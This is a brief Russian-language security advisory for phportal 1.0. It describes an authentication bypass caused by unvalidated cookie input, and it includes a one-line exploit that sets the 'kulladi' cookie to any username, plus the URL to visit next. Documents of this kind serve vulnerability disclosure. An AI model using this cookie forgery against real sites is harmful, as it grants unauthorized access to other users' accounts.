Программа: phportal 1.0
Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных при обработке cookie. Эксплуатирование уязвимости приведет к
обходу механизма аутентификации на целевой системе.
Эксплоит:
javascript:document.cookie="kulladi=[Username];path=/";
Вход.
Проследуйте: http://target.com/uye_paneli.php?islem=bilgilerim